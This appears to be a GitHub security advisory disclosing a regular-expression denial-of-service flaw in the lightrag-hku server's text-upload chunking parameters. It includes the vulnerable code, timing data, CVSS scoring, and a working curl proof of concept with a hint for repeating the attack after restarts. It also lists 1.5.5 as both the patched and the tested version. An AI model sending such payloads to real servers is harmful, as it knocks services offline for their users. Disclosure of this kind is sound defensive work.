Skip to content

ReDoS via unvalidated sentence_split_regex in chunking parameters

Moderate
danielaskdd published GHSA-32jh-39m7-8x84 Jul 31, 2026

Package

pip lightrag-hku (pip)

Affected versions

<= 1.5.4

Patched versions

1.5.5

Description

Summary

A user-supplied regular expression in the chunking parameters of POST /documents/text is
compiled and run against user-supplied text without any complexity limit or timeout. A request
carrying a catastrophically backtracking pattern (e.g. (a+)+$) pins a CPU core indefinitely.
The server stops answering requests and does not recover without a restart. Tested on 1.5.5.

Details

SemanticVectorChunkParams.sentence_split_regex accepts an arbitrary string. Its validator only
checks that the pattern compiles — lightrag/api/routers/document_routes.py:526-541:

@field_validator("sentence_split_regex")
@classmethod
def _valid_sentence_split_regex(cls, v: Optional[str]) -> Optional[str]:
    if v is None:
        return v
    try:
        re.compile(v)
    except re.error as exc:
        raise ValueError(...)
    return v

re.compile() validates syntax, not complexity. (a+)+$ is syntactically valid and passes.

The pattern is then applied to the document body in lightrag/chunker/semantic_vector.py:136:

single_sentences_list = re.split(splitter.sentence_split_regex, text)

reached from semantic_vector.py:284:

pieces = await asyncio.to_thread(_semantic_groups_with_spans, splitter, content)

There is no timeout anywhere on this path. (a+)+ is ambiguous — a run of n a characters can be
partitioned 2^(n-1) ways — and the trailing ! forces the engine to reject every one before it can
fail. Measured with stdlib re: 24 chars 0.70s, 26 chars 2.77s, 28 chars 11.2s, i.e. 2x per added
character. 40 characters does not finish.

re.split runs in C and holds the GIL, so the call cannot be interrupted and asyncio cannot
cancel it.

Both halves of the attack come from the same request body: chunking.params.sentence_split_regex
supplies the pattern, text supplies the subject.

PoC

Tested against 1.5.5 built from source. Default configuration — no special storage backend or
chunker setting required. The LLM/embedding backends do not need to work; the regex runs before
they are called.

Start the server:

docker build -t lightrag-test .
docker run -d --name lightrag-test --cpus=1 -p 9621:9621 \
  -e LLM_BINDING=ollama -e LLM_BINDING_HOST=http://127.0.0.1:1 -e LLM_MODEL=dummy \
  -e EMBEDDING_BINDING=ollama -e EMBEDDING_BINDING_HOST=http://127.0.0.1:1 -e EMBEDDING_MODEL=dummy \
  lightrag-test

Send the request (41-byte text, 7-character regex):

curl -X POST http://127.0.0.1:9621/documents/text \
  -H 'Content-Type: application/json' \
  -d '{"text":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!",
       "file_source":"attack.txt",
       "chunking":{"strategy":"semantic_vector",
                   "params":{"sentence_split_regex":"(a+)+$"}}}'

Returns 200:

{"status":"success","message":"Text successfully received. Processing will continue in
 background.","track_id":"insert_..."}

Observe:

docker stats --no-stream lightrag-test     # CPU pinned at ~100%
curl -m 20 -o /dev/null -w '%{http_code}\n' http://127.0.0.1:9621/health

/health returns 000 (no response). Measured over 5 minutes: CPU 99-100% throughout, /health
and /documents both time out, the container process stays alive. docker restart returns it to
normal in ~25s.

For a control, the same request with "sentence_split_regex":"(?<=[.?!])\\s+" completes
immediately and CPU returns to ~1%.

Note when reproducing: the document id is compute_mdhash_id(full_text, prefix="doc-")
(lightrag/lightrag.py:1711), so resubmitting the exact same text is deduplicated and does
nothing. Change the text between attempts — one extra a is enough, and also doubles the work.

Impact

ReDoS (CWE-1333) — denial of service through algorithmic complexity.

Any client that can call POST /documents/text can trigger it. That means any authenticated user
when AUTH_ACCOUNTS or LIGHTRAG_API_KEY is set, and any client at all on an instance running
without authentication.

The request is under 200 bytes, so MAX_REQUEST_BODY_BYTES and the admission-control capacity
reservation do not apply. No valid LLM or embedding credentials are needed. A single request is
enough, and it can be repeated after each restart with one character changed in the text.

POST /documents/texts takes the same chunking object and is affected identically.

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID

No known CVE

Weaknesses

Uncontrolled Resource Consumption

The product does not properly control the allocation and maintenance of a limited resource. Learn more on MITRE.

Inefficient Regular Expression Complexity

The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles. Learn more on MITRE.

Credits